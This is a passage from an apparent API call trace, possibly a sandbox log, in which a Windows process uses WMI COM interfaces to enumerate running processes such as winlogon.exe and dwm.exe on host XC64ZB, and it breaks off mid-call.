ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.176] WbemDefPath:IUnknown:QueryInterface (in: This=0x661320, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5cab58) returned 0x0 [0264.176] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5cab58, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.176] WbemDefPath:IUnknown:Release (This=0x5cab58) returned 0x3 [0264.176] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.176] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.176] WbemDefPath:IUnknown:QueryInterface (in: This=0x661320, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.176] WbemDefPath:IUnknown:Release (This=0x661320) returned 0x2 [0264.176] WbemDefPath:IUnknown:Release (This=0x661320) returned 0x1 [0264.176] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.176] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.176] WbemDefPath:IUnknown:QueryInterface (in: This=0x661320, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x661320) returned 0x0 [0264.176] WbemDefPath:IUnknown:AddRef (This=0x661320) returned 0x3 [0264.176] WbemDefPath:IUnknown:Release (This=0x661320) returned 0x2 [0264.176] WbemDefPath:IWbemPath:SetText (This=0x661320, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"508\"") returned 0x0 [0264.176] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.176] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.176] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.177] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.177] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.177] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.177] IWbemClassObject:Get (in: This=0x5fcf90, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c3144*=0, plFlavor=0x23c3148*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winlogon.exe", varVal2=0x0), pType=0x23c3144*=8, plFlavor=0x23c3148*=0) returned 0x0 [0264.177] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0264.177] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0264.177] IWbemClassObject:Get (in: This=0x5fcf90, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c3144*=8, plFlavor=0x23c3148*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winlogon.exe", varVal2=0x0), pType=0x23c3144*=8, plFlavor=0x23c3148*=0) returned 0x0 [0264.177] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0264.177] SysStringByteLen (bstr="winlogon.exe") returned 0x18 [0264.177] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0264.177] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x54bcc90, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.179] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x54bcc90) returned 0x0 [0264.179] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.179] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.179] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.179] IUnknown:AddRef (This=0x54bcc90) returned 0x3 [0264.179] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.179] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.179] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x54bcc94) returned 0x0 [0264.179] IMarshal:GetUnmarshalClass (in: This=0x54bcc94, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.179] IUnknown:Release (This=0x54bcc94) returned 0x3 [0264.179] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.180] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.180] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.180] IUnknown:Release (This=0x54bcc90) returned 0x2 [0264.180] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.180] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.180] IUnknown:QueryInterface (in: This=0x54bcc90, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x54bcc90) returned 0x0 [0264.180] IUnknown:AddRef (This=0x54bcc90) returned 0x4 [0264.180] IUnknown:Release (This=0x54bcc90) returned 0x3 [0264.180] IUnknown:Release (This=0x54bcc90) returned 0x2 [0264.180] CoTaskMemFree (pv=0x54ba2c8) [0264.180] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.180] IUnknown:AddRef (This=0x54bcc90) returned 0x3 [0264.180] IWbemClassObject:Get (in: This=0x54bcc90, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.180] IWbemClassObject:Get (in: This=0x54bcc90, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"812\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.180] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"812\"") returned 0x5c [0264.180] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"812\"") returned 0x5c [0264.180] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.181] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.181] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.181] IUnknown:Release (This=0x601a94) returned 0x1 [0264.182] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba308) returned 0x0 [0264.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba308, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.182] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba308, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x661860) returned 0x0 [0264.182] WbemDefPath:IUnknown:Release (This=0x54ba308) returned 0x0 [0264.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x661860, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x661860) returned 0x0 [0264.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x661860, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x661860, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.182] WbemDefPath:IUnknown:AddRef (This=0x661860) returned 0x3 [0264.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x661860, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x661860, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.182] WbemDefPath:IUnknown:QueryInterface (in: This=0x661860, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x662328) returned 0x0 [0264.182] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x662328, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.182] WbemDefPath:IUnknown:Release (This=0x662328) returned 0x3 [0264.183] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.183] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.183] WbemDefPath:IUnknown:QueryInterface (in: This=0x661860, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.183] WbemDefPath:IUnknown:Release (This=0x661860) returned 0x2 [0264.183] WbemDefPath:IUnknown:Release (This=0x661860) returned 0x1 [0264.183] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.183] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.183] WbemDefPath:IUnknown:QueryInterface (in: This=0x661860, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x661860) returned 0x0 [0264.183] WbemDefPath:IUnknown:AddRef (This=0x661860) returned 0x3 [0264.183] WbemDefPath:IUnknown:Release (This=0x661860) returned 0x2 [0264.183] WbemDefPath:IWbemPath:SetText (This=0x661860, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"812\"") returned 0x0 [0264.183] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.183] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.183] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.183] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.183] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.183] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.183] IWbemClassObject:Get (in: This=0x54bcc90, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c39d8*=0, plFlavor=0x23c39dc*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="dwm.exe", varVal2=0x0), pType=0x23c39d8*=8, plFlavor=0x23c39dc*=0) returned 0x0 [0264.184] SysStringByteLen (bstr="dwm.exe") returned 0xe [0264.184] SysStringByteLen (bstr="dwm.exe") returned 0xe [0264.184] IWbemClassObject:Get (in: This=0x54bcc90, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c39d8*=8, plFlavor=0x23c39dc*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="dwm.exe", varVal2=0x0), pType=0x23c39d8*=8, plFlavor=0x23c39dc*=0) returned 0x0 [0264.184] SysStringByteLen (bstr="dwm.exe") returned 0xe [0264.184] SysStringByteLen (bstr="dwm.exe") returned 0xe [0264.184] CoTaskMemAlloc (cb=0x4) returned 0x54ba3b8 [0264.184] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba3b8, puReturned=0x23c1fd0 | out: apObjects=0x54ba3b8*=0x6804a0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.185] IUnknown:QueryInterface (in: This=0x6804a0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x6804a0) returned 0x0 [0264.185] IUnknown:QueryInterface (in: This=0x6804a0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.185] IUnknown:QueryInterface (in: This=0x6804a0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.185] IUnknown:QueryInterface (in: This=0x6804a0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.185] IUnknown:AddRef (This=0x6804a0) returned 0x3 [0264.185] IUnknown:QueryInterface (in: This=0x6804a0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.185] IUnknown:QueryInterface (in: This=0x6804a0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.227] IUnknown:QueryInterface (in: This=0x6804a0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x6804a4) returned 0x0 [0264.227] IMarshal:GetUnmarshalClass (in: This=0x6804a4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.227] IUnknown:Release (This=0x6804a4) returned 0x3 [0264.227] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.227] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.227] IUnknown:QueryInterface (in: This=0x6804a0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.227] IUnknown:Release (This=0x6804a0) returned 0x2 [0264.227] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.227] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.227] IUnknown:QueryInterface (in: This=0x6804a0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x6804a0) returned 0x0 [0264.228] IUnknown:AddRef (This=0x6804a0) returned 0x4 [0264.228] IUnknown:Release (This=0x6804a0) returned 0x3 [0264.228] IUnknown:Release (This=0x6804a0) returned 0x2 [0264.228] CoTaskMemFree (pv=0x54ba3b8) [0264.228] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.228] IUnknown:AddRef (This=0x6804a0) returned 0x3 [0264.228] IWbemClassObject:Get (in: This=0x6804a0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.228] IWbemClassObject:Get (in: This=0x6804a0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1448\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.228] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1448\"") returned 0x5e [0264.228] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1448\"") returned 0x5e [0264.228] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.229] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.229] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.229] IUnknown:Release (This=0x601a94) returned 0x1 [0264.230] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba308) returned 0x0 [0264.230] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba308, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, 